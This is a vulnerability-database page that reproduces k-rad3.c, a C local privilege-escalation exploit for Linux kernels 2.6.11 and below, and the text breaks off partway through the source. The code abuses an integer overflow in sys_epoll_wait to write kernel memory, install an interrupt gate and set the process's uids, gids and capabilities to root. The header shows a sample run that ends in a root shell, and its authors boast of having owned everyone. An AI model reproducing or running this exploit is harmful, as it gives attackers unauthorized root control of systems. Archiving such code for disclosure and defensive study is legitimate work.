Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux Kernel <= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c)

🗓️ 06 Jul 2008 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 39 Views

Linux Kernel <= 2.6.11 Local Root Exploi

Code

                                                /*
*&nbsp;k-rad3.c&nbsp;-&nbsp;linux&nbsp;2.6.11&nbsp;and&nbsp;below&nbsp;CPL&nbsp;0&nbsp;kernel&nbsp;local&nbsp;exploit&nbsp;v3
*&nbsp;Discovered&nbsp;and&nbsp;original&nbsp;exploit&nbsp;coded&nbsp;Jan&nbsp;2005&nbsp;by&nbsp;sd&nbsp;&lt;[email protected]&gt;
*
*********************************************************************
*
*&nbsp;Modified&nbsp;2005/9&nbsp;by&nbsp;alert7&nbsp;&lt;[email protected]&gt;
*&nbsp;XFOCUS&nbsp;Security&nbsp;Team&nbsp;http://www.xfocus.org
*
*&nbsp;gcc&nbsp;-o&nbsp;k-rad3&nbsp;k-rad3.c&nbsp;-static&nbsp;-O2
*
*&nbsp;tested&nbsp;succeed&nbsp;:
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;on&nbsp;default&nbsp;installed&nbsp;RHEL4(2.6.9-5.EL&nbsp;and&nbsp;2.6.9-5.ELsmp)
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;2.6.9-5.EL&nbsp;./k-rad3&nbsp;-p&nbsp;2
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;2.6.9-5.ELsmp&nbsp;./k-rad3&nbsp;-a&nbsp;-p&nbsp;7
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;on&nbsp;default&nbsp;installed&nbsp;maglic&nbsp;linux&nbsp;1.2&nbsp;
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MagicLinux&nbsp;2.6.9&nbsp;#1&nbsp;./k-rad3&nbsp;-t&nbsp;1&nbsp;-p&nbsp;2
*
*&nbsp;thank&nbsp;watercloud&nbsp;tested&nbsp;maglic&nbsp;linux&nbsp;1.2
*&nbsp;thank&nbsp;eist&nbsp;provide&nbsp;RHEL4&nbsp;to&nbsp;test
*&nbsp;thank&nbsp;sd&nbsp;&lt;[email protected]&gt;&nbsp;share&nbsp;his&nbsp;stuff.
*&nbsp;thank&nbsp;xfocus&nbsp;&amp;&nbsp;xfocus's&nbsp;firends
*
*
*&nbsp;TODO:
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;CASE&nbsp;1:&nbsp;use&nbsp;stack&nbsp;&gt;&nbsp;0xc0000000
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;CASE&nbsp;2:&nbsp;CONFIG_X86_PAE&nbsp;define&nbsp;,but&nbsp;cpu&nbsp;flag&nbsp;no&nbsp;pse
*
*[alert7@MagicLinux&nbsp;~]$&nbsp;./k-rad3&nbsp;-h
*[&nbsp;&nbsp;k-rad3&nbsp;-&nbsp;&lt;=linux&nbsp;2.6.11&nbsp;CPL&nbsp;0&nbsp;kernel&nbsp;exploit&nbsp;&nbsp;]
*[&nbsp;Discovered&nbsp;Jan&nbsp;2005&nbsp;by&nbsp;sd&nbsp;&lt;[email protected]&gt;&nbsp;]
*[&nbsp;Modified&nbsp;2005/9&nbsp;by&nbsp;alert7&nbsp;&lt;[email protected]&gt;&nbsp;]
*
*Usage:&nbsp;./k-rad3
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-s&nbsp;forced&nbsp;cpu&nbsp;flag&nbsp;pse
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-a&nbsp;define&nbsp;CONFIG_X86_PAE,default&nbsp;none
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-e&nbsp;&lt;num&gt;&nbsp;have&nbsp;two&nbsp;kernel&nbsp;code,default&nbsp;0
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-p&nbsp;&lt;num&gt;&nbsp;alloc&nbsp;pages(4k)&nbsp;,default&nbsp;1.&nbsp;Increase&nbsp;from&nbsp;1&nbsp;to&nbsp;7
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;The&nbsp;higher&nbsp;number&nbsp;the&nbsp;more&nbsp;likely&nbsp;it&nbsp;will&nbsp;crash
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-t&nbsp;&lt;num&gt;&nbsp;default&nbsp;0
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0&nbsp;:THREAD_SIZE&nbsp;is&nbsp;4096;otherwise&nbsp;THREAD_SIZE&nbsp;is&nbsp;8192
*
*[alert7@MagicLinux&nbsp;~]$&nbsp;./k-rad3&nbsp;-t&nbsp;1&nbsp;-p&nbsp;2
*[&nbsp;&nbsp;k-rad3&nbsp;-&nbsp;&lt;=linux&nbsp;2.6.11&nbsp;CPL&nbsp;0&nbsp;kernel&nbsp;exploit&nbsp;&nbsp;]
*[&nbsp;Discovered&nbsp;Jan&nbsp;2005&nbsp;by&nbsp;sd&nbsp;&lt;[email protected]&gt;&nbsp;]
*[&nbsp;Modified&nbsp;2005/9&nbsp;by&nbsp;alert7&nbsp;&lt;[email protected]&gt;&nbsp;]
*[+]&nbsp;try&nbsp;open&nbsp;/proc/cpuinfo&nbsp;..&nbsp;ok!!
*[+]&nbsp;find&nbsp;cpu&nbsp;flag&nbsp;pse&nbsp;in&nbsp;/proc/cpuinfo
*[+]&nbsp;CONFIG_X86_PAE&nbsp;:none
*[+]&nbsp;Cpu&nbsp;flag:&nbsp;pse&nbsp;ok
*[+]&nbsp;Exploit&nbsp;Way&nbsp;:&nbsp;0
*[+]&nbsp;Use&nbsp;2&nbsp;pages&nbsp;(one&nbsp;page&nbsp;is&nbsp;4K&nbsp;),rewrite&nbsp;0xc0000000--(0xc0002000&nbsp;+&nbsp;n)
*[+]&nbsp;thread_size&nbsp;1&nbsp;(0&nbsp;:THREAD_SIZE&nbsp;is&nbsp;4096;otherwise&nbsp;THREAD_SIZE&nbsp;is&nbsp;8192
*[+]&nbsp;idtr.base&nbsp;0xc0461000&nbsp;,base&nbsp;0xc0000000
*[+]&nbsp;kwrite&nbsp;base&nbsp;0xc0000000,&nbsp;buf&nbsp;0xbffed750,num&nbsp;8196
*[+]&nbsp;idt[0x7f]&nbsp;addr&nbsp;0xffc003f8
*[+]&nbsp;j00&nbsp;1u(k7&nbsp;k1d!
*[root@k-rad3&nbsp;~]&nbsp;#id
*uid=0(root)&nbsp;gid=0(root)&nbsp;groups=500(alert7)
*
*
*&nbsp;&nbsp;Linux&nbsp;Kernel&nbsp;&lt;=&nbsp;2.6.11&nbsp;&quot;sys_epoll_wait&quot;&nbsp;Local&nbsp;integer&nbsp;overflow&nbsp;Exploit
*&nbsp;
*&nbsp;&quot;it&nbsp;is&nbsp;possible&nbsp;to&nbsp;partially&nbsp;overwrite&nbsp;low&nbsp;kernel&nbsp;(&nbsp;&gt;=&nbsp;2.6&nbsp;&lt;=&nbsp;2.6.11)&nbsp;
*&nbsp;memory&nbsp;due&nbsp;to&nbsp;integer&nbsp;overflow&nbsp;in&nbsp;sys_epoll_wait&nbsp;and&nbsp;misuse&nbsp;of
*&nbsp;__put_user&nbsp;in&nbsp;ep_send_events&quot;
*&nbsp;Georgi&nbsp;Guninski:&nbsp;http://seclists.org/lists/fulldisclosure/2005/Mar/0293.html
*
*********************************************************************
*
*
*&nbsp;In&nbsp;memory&nbsp;of&nbsp;pwned.c&nbsp;(uselib)
*&nbsp;
*&nbsp;-&nbsp;Redistributions&nbsp;of&nbsp;source&nbsp;code&nbsp;is&nbsp;not&nbsp;permitted.
*&nbsp;-&nbsp;Redistributions&nbsp;in&nbsp;the&nbsp;binary&nbsp;form&nbsp;is&nbsp;not&nbsp;permitted.
*&nbsp;-&nbsp;Redistributions&nbsp;of&nbsp;the&nbsp;above&nbsp;copyright&nbsp;notice,&nbsp;this&nbsp;list&nbsp;of&nbsp;conditions,
*&nbsp;and&nbsp;the&nbsp;following&nbsp;disclaimer&nbsp;is&nbsp;permitted.
*&nbsp;-&nbsp;By&nbsp;proceeding&nbsp;to&nbsp;a&nbsp;Redistribution&nbsp;and&nbsp;under&nbsp;any&nbsp;form&nbsp;of&nbsp;the&nbsp;Program
*&nbsp;the&nbsp;Distributor&nbsp;is&nbsp;granting&nbsp;ownership&nbsp;of&nbsp;his&nbsp;Resources&nbsp;without
*&nbsp;limitations&nbsp;to&nbsp;the&nbsp;copyright&nbsp;holder(s).
*
*&nbsp;
*&nbsp;Since&nbsp;we&nbsp;already&nbsp;owned&nbsp;everyone,&nbsp;theres&nbsp;no&nbsp;point&nbsp;keeping&nbsp;this&nbsp;private
*&nbsp;anymore.
*
*&nbsp;http://seclists.org/lists/fulldisclosure/2005/Mar/0293.html
*
*&nbsp;Thanks&nbsp;to&nbsp;our&nbsp;internet&nbsp;hero&nbsp;georgi&nbsp;guninski&nbsp;for&nbsp;being&nbsp;such&nbsp;incredible
*&nbsp;whitehat&nbsp;disclosing&nbsp;one&nbsp;of&nbsp;the&nbsp;most&nbsp;reliable&nbsp;kernel&nbsp;bugs.
*&nbsp;You&nbsp;saved&nbsp;the&nbsp;world,&nbsp;man,&nbsp;we&nbsp;owe&nbsp;you&nbsp;one!
*
*&nbsp;This&nbsp;version&nbsp;is&nbsp;somewhat&nbsp;broken,&nbsp;but&nbsp;skilled&nbsp;reader&nbsp;will&nbsp;get&nbsp;an&nbsp;idea.
*&nbsp;Well,&nbsp;at&nbsp;least&nbsp;let&nbsp;the&nbsp;scriptkids&nbsp;have&nbsp;fun&nbsp;for&nbsp;a&nbsp;while.
*
*&nbsp;Thanks&nbsp;to&nbsp;all&nbsp;who&nbsp;helped&nbsp;me&nbsp;developing/testing&nbsp;this,&nbsp;you&nbsp;know&nbsp;who&nbsp;you&nbsp;are,
*&nbsp;and&nbsp;especially&nbsp;to&nbsp;my&nbsp;gf&nbsp;for&nbsp;guidance&nbsp;while&nbsp;coding&nbsp;this.
*
*/

#define&nbsp;_GNU_SOURCE

#include&nbsp;&lt;stdlib.h&gt;
#include&nbsp;&lt;stdio.h&gt;
#include&nbsp;&lt;sys/types.h&gt;
#include&nbsp;&lt;sys/socket.h&gt;
#include&nbsp;&lt;sys/epoll.h&gt;
#include&nbsp;&lt;sys/mman.h&gt;
#include&nbsp;&lt;sys/resource.h&gt;
#include&nbsp;&lt;linux/capability.h&gt;
#include&nbsp;&lt;asm/unistd.h&gt;
#ifndef&nbsp;__USE_GNU
	#define&nbsp;__USE_GNU
#endif
#include&nbsp;&lt;unistd.h&gt;
#include&nbsp;&lt;errno.h&gt;
#include&nbsp;&lt;signal.h&gt;
#include&nbsp;&lt;string.h&gt;

/**
&nbsp;&nbsp;*&nbsp;Relationship&nbsp;Variables
&nbsp;&nbsp;*
&nbsp;&nbsp;*&nbsp;1:&nbsp;CONFIG_X86_PAE&nbsp;
&nbsp;&nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;see&nbsp;/lib/modules/`uname&nbsp;-r`/build/.config
&nbsp;&nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1.1:&nbsp;pse
&nbsp;&nbsp;*&nbsp;2:&nbsp;THREAD_SIZE
&nbsp;&nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;see&nbsp;include/asm/thread_info.h&nbsp;THREAD_SIZE&nbsp;define
&nbsp;&nbsp;*/


#define&nbsp;MAP&nbsp;(0xfffff000&nbsp;-&nbsp;(1023*4096))
#define&nbsp;MAP_PAE&nbsp;(0xfffff000&nbsp;-&nbsp;(511*4096))
#define&nbsp;MKPTE(addr)&nbsp;((addr&nbsp;&amp;&nbsp;(~4095))&nbsp;|&nbsp;0x27)
#define&nbsp;MKPMD(x)&nbsp;(0x1e3|0x004)

////////////////////////////////////////////////

#define&nbsp;KRADPS1&nbsp;&quot;k-rad3&quot;

#define&nbsp;kB&nbsp;*&nbsp;1024
#define&nbsp;MB&nbsp;*&nbsp;1024&nbsp;kB
#define&nbsp;GB&nbsp;*&nbsp;1024&nbsp;MB

#define&nbsp;KRS&nbsp;&quot;\033[1;30m[&nbsp;\033[1;37m&quot;
#define&nbsp;KRE&nbsp;&quot;\033[1;30m&nbsp;]\033[0m&quot;
#define&nbsp;KRAD&nbsp;&quot;\033[1;30m[\033[1;37m*\033[1;30m]\033[0m&nbsp;&quot;
#define&nbsp;KRADP&nbsp;&quot;\033[1;30m[\033[1;37m+\033[1;30m]\033[0m&nbsp;&quot;
#define&nbsp;KRADM&nbsp;&quot;\033[1;30m[\033[1;37m-\033[1;30m]\033[0m&nbsp;&quot;

#define&nbsp;SET_IDT_GATE(idt,ring,s,addr)&nbsp;\
	(idt).off1&nbsp;=&nbsp;addr&nbsp;&amp;&nbsp;0xffff;&nbsp;\
	(idt).off2&nbsp;=&nbsp;addr&nbsp;&gt;&gt;&nbsp;16;&nbsp;\
	(idt).sel&nbsp;=&nbsp;s;&nbsp;\
	(idt).none&nbsp;=&nbsp;0;&nbsp;\
	(idt).flags&nbsp;=&nbsp;0x8E&nbsp;|&nbsp;(ring&nbsp;&lt;&lt;&nbsp;5);&nbsp;

//config&nbsp;val
static&nbsp;int&nbsp;havepse&nbsp;		=&nbsp;0;
static&nbsp;int&nbsp;definePAE	=&nbsp;0;
static&nbsp;int&nbsp;exploitway	=&nbsp;0;
static&nbsp;int&nbsp;npages&nbsp;		=&nbsp;1;
static&nbsp;int&nbsp;thread_size&nbsp;&nbsp;&nbsp;=&nbsp;0;


static&nbsp;uid_t&nbsp;uid		=&nbsp;0;
static&nbsp;unsigned&nbsp;long&nbsp;long&nbsp;*clear1;
static&nbsp;char&nbsp;*&nbsp;progargv0;

struct&nbsp;idtr&nbsp;{
	unsigned&nbsp;short&nbsp;limit;
	unsigned&nbsp;int&nbsp;base;
}&nbsp;__attribute__&nbsp;((packed));

struct&nbsp;idt&nbsp;{
	unsigned&nbsp;short&nbsp;off1;
	unsigned&nbsp;short&nbsp;sel;
	unsigned&nbsp;char&nbsp;none,flags;
	unsigned&nbsp;short&nbsp;off2;
}&nbsp;__attribute__&nbsp;((packed));



#define&nbsp;__syscall_return(type,&nbsp;res)&nbsp;\
do&nbsp;{&nbsp;\
	if&nbsp;((unsigned&nbsp;long)(res)&nbsp;&gt;=&nbsp;(unsigned&nbsp;long)(-125))&nbsp;{&nbsp;\
	errno&nbsp;=&nbsp;-(res);&nbsp;\
	res&nbsp;=&nbsp;-1;&nbsp;\
	}&nbsp;\
	return&nbsp;(type)&nbsp;(res);&nbsp;\
}&nbsp;while&nbsp;(0)


#define&nbsp;_capget_macro(type,name,type1,arg1,type2,arg2)&nbsp;\
	type&nbsp;name(type1&nbsp;arg1,type2&nbsp;arg2)&nbsp;\
	{&nbsp;\
	long&nbsp;__res;&nbsp;\
	__asm__&nbsp;volatile&nbsp;(&nbsp;&quot;int&nbsp;$0x80&quot;&nbsp;\
	:&nbsp;&quot;=a&quot;&nbsp;(__res)&nbsp;\
	:&nbsp;&quot;0&quot;&nbsp;(__NR_##name),&quot;b&quot;&nbsp;((long)(arg1)),&quot;c&quot;&nbsp;((long)(arg2)));&nbsp;\
	__syscall_return(type,__res);&nbsp;\
	}

static&nbsp;inline&nbsp;_capget_macro(int,capget,void&nbsp;*,a,void&nbsp;*,b);

static&nbsp;int&nbsp;THREAD_SIZE_MASK&nbsp;=(-4096);


static&nbsp;void&nbsp;
fatal(const&nbsp;char&nbsp;*message)
{
	system(&quot;uname&nbsp;-a&quot;);
	printf(&quot;[-]&nbsp;%s\n&quot;,message);
	exit(1);
}

void&nbsp;kernel(unsigned&nbsp;*&nbsp;task)
{
	unsigned&nbsp;*&nbsp;addr&nbsp;=&nbsp;task;
	/*&nbsp;looking&nbsp;for&nbsp;uids&nbsp;*/

	*clear1&nbsp;=&nbsp;0;

	while&nbsp;(addr[0]&nbsp;!=&nbsp;uid&nbsp;||&nbsp;addr[1]&nbsp;!=&nbsp;uid&nbsp;||
		addr[2]&nbsp;!=&nbsp;uid&nbsp;||&nbsp;addr[3]&nbsp;!=&nbsp;uid
		)
		addr++;
	
	addr[0]&nbsp;=&nbsp;addr[1]&nbsp;=&nbsp;addr[2]&nbsp;=&nbsp;addr[3]&nbsp;=&nbsp;0;&nbsp;/*&nbsp;set&nbsp;uids&nbsp;*/
	addr[4]&nbsp;=&nbsp;addr[5]&nbsp;=&nbsp;addr[6]&nbsp;=&nbsp;addr[7]&nbsp;=&nbsp;0;&nbsp;/*&nbsp;set&nbsp;gids&nbsp;*/

}
&nbsp;
void&nbsp;kcode(void);
void&nbsp;__kcode(void)
{
	asm(
	&quot;kcode:&nbsp;\n&quot;
	&quot;cld&nbsp;\n&quot;
	&quot;&nbsp;pusha&nbsp;\n&quot;
	&quot;&nbsp;pushl&nbsp;%es&nbsp;\n&quot;
	&quot;&nbsp;pushl&nbsp;%ds&nbsp;\n&quot;
	&quot;&nbsp;movl&nbsp;%ss,%edx&nbsp;\n&quot;
	&quot;&nbsp;movl&nbsp;%edx,%es&nbsp;\n&quot;
	&quot;&nbsp;movl&nbsp;%edx,%ds&nbsp;\n&quot;);
	__asm__(&quot;movl&nbsp;%0&nbsp;,%%eax&quot;&nbsp;::&quot;m&quot;(THREAD_SIZE_MASK)&nbsp;);
	asm(
	&quot;&nbsp;andl&nbsp;%esp,%eax&nbsp;\n&quot;
	&quot;&nbsp;pushl&nbsp;(%eax)&nbsp;\n&quot;
	&quot;&nbsp;call&nbsp;kernel&nbsp;\n&quot;
	&quot;&nbsp;addl&nbsp;$4,&nbsp;%esp&nbsp;\n&quot;
	&quot;&nbsp;popl&nbsp;%ds&nbsp;\n&quot;
	&quot;&nbsp;popl&nbsp;%es&nbsp;\n&quot;
	&quot;&nbsp;popa&nbsp;\n&quot;
	&quot;&nbsp;cli&nbsp;\n&quot;
	&quot;&nbsp;iret&nbsp;\n&quot;
	);
}


void&nbsp;raise_cap(unsigned&nbsp;long&nbsp;*ts)
{
/*&nbsp;must&nbsp;be&nbsp;on&nbsp;lower&nbsp;addresses&nbsp;because&nbsp;of&nbsp;kernel&nbsp;arg&nbsp;check&nbsp;:)&nbsp;*/
static&nbsp;struct&nbsp;__user_cap_header_struct&nbsp;head;
static&nbsp;struct&nbsp;__user_cap_data_struct&nbsp;data;
static&nbsp;struct&nbsp;__user_cap_data_struct&nbsp;n;

int&nbsp;i;

*clear1&nbsp;=&nbsp;0;
head.version&nbsp;=&nbsp;0x19980330;
head.pid&nbsp;=&nbsp;0;
capget(&amp;head,&nbsp;&amp;data);
/*&nbsp;scan&nbsp;the&nbsp;thread_struct&nbsp;*/
for&nbsp;(i&nbsp;=&nbsp;0;&nbsp;i&nbsp;&lt;&nbsp;512;&nbsp;i++,&nbsp;ts++)&nbsp;
{
	/*&nbsp;is&nbsp;it&nbsp;capabilities&nbsp;block?&nbsp;*/
	if&nbsp;(&nbsp;&nbsp;(ts[0]&nbsp;==&nbsp;data.effective)&nbsp;&amp;&amp;
		(ts[1]&nbsp;==&nbsp;data.inheritable)&nbsp;&amp;&amp;
		(ts[2]&nbsp;==&nbsp;data.permitted))&nbsp;
	{
		/*&nbsp;set&nbsp;effective&nbsp;cap&nbsp;to&nbsp;some&nbsp;val&nbsp;*/
		ts[0]&nbsp;=&nbsp;0x12341234;
		capget(&amp;head,&nbsp;&amp;n);
		/*&nbsp;and&nbsp;test&nbsp;if&nbsp;it&nbsp;has&nbsp;changed&nbsp;*/
		if&nbsp;(n.effective&nbsp;==&nbsp;ts[0])&nbsp;
		{
			/*&nbsp;if&nbsp;so,&nbsp;we're&nbsp;in&nbsp;:)&nbsp;*/
			ts[0]&nbsp;=&nbsp;ts[1]&nbsp;=&nbsp;ts[2]&nbsp;=&nbsp;0xffffffff;
			return;
		}
		/*&nbsp;otherwise&nbsp;fix&nbsp;back&nbsp;the&nbsp;stuff
		(if&nbsp;we've&nbsp;not&nbsp;crashed&nbsp;already&nbsp;:)&nbsp;*/
		ts[0]&nbsp;=&nbsp;data.effective;
	}
}
return;
}


void&nbsp;stub(void);
void&nbsp;__stub(void)
{
	asm&nbsp;(
	&quot;stub:;&quot;
	&quot;&nbsp;pusha;&quot;
	);
	__asm__(&quot;movl&nbsp;%0&nbsp;,%%eax&quot;&nbsp;::&quot;m&quot;(THREAD_SIZE_MASK)&nbsp;);
	asm(
	&quot;&nbsp;and&nbsp;%esp,&nbsp;%eax;&quot;
	&quot;&nbsp;pushl&nbsp;(%eax);&quot;
	&quot;&nbsp;call&nbsp;raise_cap;&quot;
	&quot;&nbsp;pop&nbsp;%eax;&quot;
	&quot;&nbsp;popa;&quot;
	&quot;&nbsp;iret;&quot;
	);

}


/*&nbsp;write&nbsp;to&nbsp;kernel&nbsp;from&nbsp;buf,&nbsp;num&nbsp;bytes&nbsp;*/
static&nbsp;int&nbsp;
kwrite(unsigned&nbsp;base,&nbsp;char&nbsp;*buf,&nbsp;int&nbsp;num)
{
#define&nbsp;DIV&nbsp;256
#define&nbsp;RES&nbsp;4

int&nbsp;efd,&nbsp;c,&nbsp;i,&nbsp;fd;
int&nbsp;pi[2];
struct&nbsp;epoll_event&nbsp;ev;
int&nbsp;*stab;
unsigned&nbsp;long&nbsp;ptr;
int&nbsp;count;
unsigned&nbsp;magic&nbsp;=&nbsp;0xffffffff&nbsp;/&nbsp;12&nbsp;+&nbsp;1;

	printf(&quot;[+]&nbsp;kwrite&nbsp;base&nbsp;%p,&nbsp;buf&nbsp;%p,num&nbsp;%d\n&quot;,&nbsp;(void&nbsp;*)base,buf,num);
	/*&nbsp;initialize&nbsp;epoll&nbsp;*/
	efd&nbsp;=&nbsp;epoll_create(4096);
	if&nbsp;(efd&nbsp;&lt;&nbsp;0)
		return&nbsp;-1;
	
	ev.events&nbsp;=&nbsp;EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP;

	/*&nbsp;12&nbsp;bytes&nbsp;per&nbsp;fd&nbsp;+&nbsp;one&nbsp;more&nbsp;to&nbsp;be&nbsp;safely&nbsp;in&nbsp;stack&nbsp;space&nbsp;*/
	count&nbsp;=&nbsp;(num+11)/12+RES;

	/*&nbsp;desc&nbsp;array&nbsp;*/
	stab&nbsp;=&nbsp;alloca((count+DIV-1)/DIV*sizeof(int));

	for&nbsp;(i&nbsp;=&nbsp;0;&nbsp;i&nbsp;&lt;&nbsp;((count+DIV-1)/DIV)+1;&nbsp;i++)&nbsp;
	{

		if&nbsp;(socketpair(AF_UNIX,&nbsp;SOCK_DGRAM,&nbsp;0,&nbsp;pi)&nbsp;&lt;&nbsp;0)
			return&nbsp;-1;

		send(pi[0],&nbsp;&quot;a&quot;,&nbsp;1,&nbsp;0);
		stab[i]&nbsp;=&nbsp;pi[1];
	}

	/*&nbsp;highest&nbsp;fd&nbsp;and&nbsp;first&nbsp;descriptor&nbsp;*/
	fd&nbsp;=&nbsp;pi[1];
	/*&nbsp;we've&nbsp;to&nbsp;allocate&nbsp;this&nbsp;separately&nbsp;because&nbsp;we&nbsp;need&nbsp;to&nbsp;have
	it's&nbsp;fd&nbsp;preserved&nbsp;-&nbsp;using&nbsp;this&nbsp;we'll&nbsp;be&nbsp;writing&nbsp;actual&nbsp;bytes&nbsp;*/
	epoll_ctl(efd,&nbsp;EPOLL_CTL_ADD,&nbsp;fd,&nbsp;&amp;ev);
	//printf(&quot;EPOLL_CTL_ADD&nbsp;count&nbsp;%u\n&quot;,count);
	for&nbsp;(i&nbsp;=&nbsp;0,&nbsp;c&nbsp;=&nbsp;0;&nbsp;i&nbsp;&lt;&nbsp;(count-1);&nbsp;i++)&nbsp;
	{
		int&nbsp;n;
		n&nbsp;=&nbsp;dup2(stab[i/DIV],&nbsp;fd+2+(i&nbsp;%&nbsp;DIV));
		if&nbsp;(n&nbsp;&lt;&nbsp;0)
			return&nbsp;-1;
		epoll_ctl(efd,&nbsp;EPOLL_CTL_ADD,&nbsp;n,&nbsp;&amp;ev);
		close(n);
	}

	/*&nbsp;in&nbsp;'n'&nbsp;we've&nbsp;the&nbsp;latest&nbsp;fd&nbsp;we're&nbsp;using&nbsp;to&nbsp;write&nbsp;data&nbsp;*/
	for&nbsp;(i&nbsp;=&nbsp;0;&nbsp;i&nbsp;&lt;&nbsp;((num+7)/8);&nbsp;i++)&nbsp;
	{
		/*&nbsp;data&nbsp;being&nbsp;written&nbsp;from&nbsp;end&nbsp;*/
		memcpy(&amp;ev.data,&nbsp;buf&nbsp;+&nbsp;num&nbsp;-&nbsp;8&nbsp;-&nbsp;i&nbsp;*&nbsp;8,&nbsp;8);
		epoll_ctl(efd,&nbsp;EPOLL_CTL_MOD,&nbsp;fd,&nbsp;&amp;ev);

		/*&nbsp;the&nbsp;actual&nbsp;kernel&nbsp;magic&nbsp;*/
		ptr&nbsp;=&nbsp;(base&nbsp;+&nbsp;num&nbsp;-&nbsp;(i*8))&nbsp;-&nbsp;(count&nbsp;*&nbsp;12);
		struct&nbsp;epoll_event&nbsp;*events&nbsp;=(struct&nbsp;epoll_event&nbsp;*)ptr;
		//printf(&quot;epoll_wait&nbsp;verify_area(%p,%p)&nbsp;addr&nbsp;%p&nbsp;%p\n&quot;,ptr,magic*&nbsp;sizeof(struct&nbsp;epoll_event)&nbsp;,&amp;events[0].events,magic);
		int&nbsp;iret&nbsp;=epoll_wait(efd,&nbsp;(void&nbsp;*)&nbsp;ptr,&nbsp;magic,&nbsp;31337);
		if&nbsp;(iret&nbsp;==-1)
		{
			perror(&quot;epoll_wait&quot;);
			fatal(&quot;This&nbsp;kernel&nbsp;not&nbsp;vulnerability!!!&quot;);

		}
		/*&nbsp;don't&nbsp;ask&nbsp;why&nbsp;(rotten&nbsp;rb-trees)&nbsp;:)&nbsp;*/
		if&nbsp;(i)
		{
			//printf(&quot;epoll_wait&nbsp;verify_area(%p,%p)&nbsp;%p\n&quot;,ptr,magic*&nbsp;sizeof(struct&nbsp;epoll_event)&nbsp;,magic);
			iret&nbsp;=&nbsp;epoll_wait(efd,&nbsp;(void&nbsp;*)ptr,&nbsp;magic,&nbsp;31337);
	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(iret&nbsp;==-1)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;perror(&quot;epoll_wait&quot;);
				fatal(&quot;This&nbsp;kernel&nbsp;not&nbsp;vulnerability!!!&quot;);
	
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}

		}
	}

	close(efd);
	for&nbsp;(i&nbsp;=&nbsp;3;&nbsp;i&nbsp;&lt;=&nbsp;fd;&nbsp;i++)
		close(i);
	
	return&nbsp;0;
	
}

/*&nbsp;real-mode&nbsp;interrupt&nbsp;table&nbsp;fixup&nbsp;-&nbsp;point&nbsp;all&nbsp;interrupts&nbsp;to&nbsp;iret.
let's&nbsp;hope&nbsp;this&nbsp;will&nbsp;shut&nbsp;up&nbsp;apm&nbsp;*/
static&nbsp;void
fixint(char&nbsp;*buf)
{
unsigned&nbsp;*tab&nbsp;=&nbsp;(void&nbsp;*)&nbsp;buf;
int&nbsp;i;

	for&nbsp;(i&nbsp;=&nbsp;0;&nbsp;i&nbsp;&lt;&nbsp;256;&nbsp;i++)
		tab[i]&nbsp;=&nbsp;0x0000400;&nbsp;/*&nbsp;0000:0400h&nbsp;*/
	/*&nbsp;iret&nbsp;*/
	buf[0x400]&nbsp;=0xcf;&nbsp;
}

/*&nbsp;establish&nbsp;pte&nbsp;pointing&nbsp;to&nbsp;virtual&nbsp;addr&nbsp;'addr'&nbsp;*/
static&nbsp;int&nbsp;
map_pte(unsigned&nbsp;base,&nbsp;int&nbsp;pagenr,&nbsp;unsigned&nbsp;addr)
{
	unsigned&nbsp;*buf&nbsp;=&nbsp;alloca(pagenr&nbsp;*&nbsp;4096&nbsp;+&nbsp;8);
	buf[(pagenr)&nbsp;*&nbsp;1024]&nbsp;=&nbsp;MKPTE(addr);
